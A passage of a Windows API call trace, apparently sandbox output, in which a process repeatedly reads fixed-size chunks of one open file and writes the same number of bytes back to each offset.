Size=0x1e848) returned 0x5557b0 [0120.259] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x56c8cc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.259] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.271] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x56c8cc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.271] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.271] GetProcessHeap () returned 0x500000 [0120.271] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.271] GetProcessHeap () returned 0x500000 [0120.272] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.272] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5705d50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.272] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.292] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5705d50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.292] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.292] GetProcessHeap () returned 0x500000 [0120.292] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.292] GetProcessHeap () returned 0x500000 [0120.293] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.293] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5742de0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.293] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.303] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5742de0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.303] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.304] GetProcessHeap () returned 0x500000 [0120.304] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.304] GetProcessHeap () returned 0x500000 [0120.304] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.304] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x577fe70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.304] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.315] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x577fe70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.315] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.316] GetProcessHeap () returned 0x500000 [0120.316] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.316] GetProcessHeap () returned 0x500000 [0120.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.316] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x57bcf00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.316] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.327] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x57bcf00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.327] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.328] GetProcessHeap () returned 0x500000 [0120.328] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.328] GetProcessHeap () returned 0x500000 [0120.328] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.328] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x57f9f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.328] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.349] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x57f9f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.349] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.350] GetProcessHeap () returned 0x500000 [0120.351] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.351] GetProcessHeap () returned 0x500000 [0120.351] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.351] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5837020, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.351] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.361] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5837020, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.361] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.362] GetProcessHeap () returned 0x500000 [0120.362] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.362] GetProcessHeap () returned 0x500000 [0120.362] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.362] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x58740b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.362] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.373] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x58740b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.373] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.373] GetProcessHeap () returned 0x500000 [0120.373] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.373] GetProcessHeap () returned 0x500000 [0120.373] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.374] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x58b1140, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.374] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.386] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x58b1140, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.386] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.387] GetProcessHeap () returned 0x500000 [0120.387] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.387] GetProcessHeap () returned 0x500000 [0120.387] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.387] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x58ee1d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.387] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.407] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x58ee1d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.407] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.408] GetProcessHeap () returned 0x500000 [0120.408] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.408] GetProcessHeap () returned 0x500000 [0120.408] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.408] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x592b260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.408] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.417] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x592b260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.417] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.418] GetProcessHeap () returned 0x500000 [0120.418] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.418] GetProcessHeap () returned 0x500000 [0120.418] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.418] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x59682f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.418] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.436] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x59682f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.436] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.436] GetProcessHeap () returned 0x500000 [0120.436] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.436] GetProcessHeap () returned 0x500000 [0120.436] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.436] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x59a5380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.437] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.448] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x59a5380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.448] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.448] GetProcessHeap () returned 0x500000 [0120.448] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.448] GetProcessHeap () returned 0x500000 [0120.448] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.448] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x59e2410, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.449] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.466] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x59e2410, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.466] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.467] GetProcessHeap () returned 0x500000 [0120.467] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.467] GetProcessHeap () returned 0x500000 [0120.467] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.467] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5a1f4a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.467] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.487] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5a1f4a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.487] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.488] GetProcessHeap () returned 0x500000 [0120.488] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.488] GetProcessHeap () returned 0x500000 [0120.488] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.488] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5a5c530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.488] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.498] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5a5c530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.498] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.499] GetProcessHeap () returned 0x500000 [0120.499] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.499] GetProcessHeap () returned 0x500000 [0120.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.499] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5a995c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.499] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.508] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5a995c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.508] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.508] GetProcessHeap () returned 0x500000 [0120.508] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.508] GetProcessHeap () returned 0x500000 [0120.508] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.508] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5ad6650, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.508] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.517] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5ad6650, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.517] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.518] GetProcessHeap () returned 0x500000 [0120.518] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.518] GetProcessHeap () returned 0x500000 [0120.518] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.518] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5b136e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.518] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.560] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5b136e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.560] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.560] GetProcessHeap () returned 0x500000 [0120.560] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.560] GetProcessHeap () returned 0x500000 [0120.560] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.560] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5b50770, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.561] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.568] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5b50770, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.568] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.568] GetProcessHeap () returned 0x500000 [0120.568] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.568] GetProcessHeap () returned 0x500000 [0120.568] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.568] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5b8d800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.568] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.606] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5b8d800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.606] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.607] GetProcessHeap () returned 0x500000 [0120.607] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.607] GetProcessHeap () returned 0x500000 [0120.607] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.607] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5bca890, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.607] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.616] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5bca890, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.616] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.617] GetProcessHeap () returned 0x500000 [0120.617] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.617] GetProcessHeap () returned 0x500000 [0120.617] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.617] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5c07920, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.617] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.636] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5c07920, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.636] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.637] GetProcessHeap () returned 0x500000 [0120.637] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: 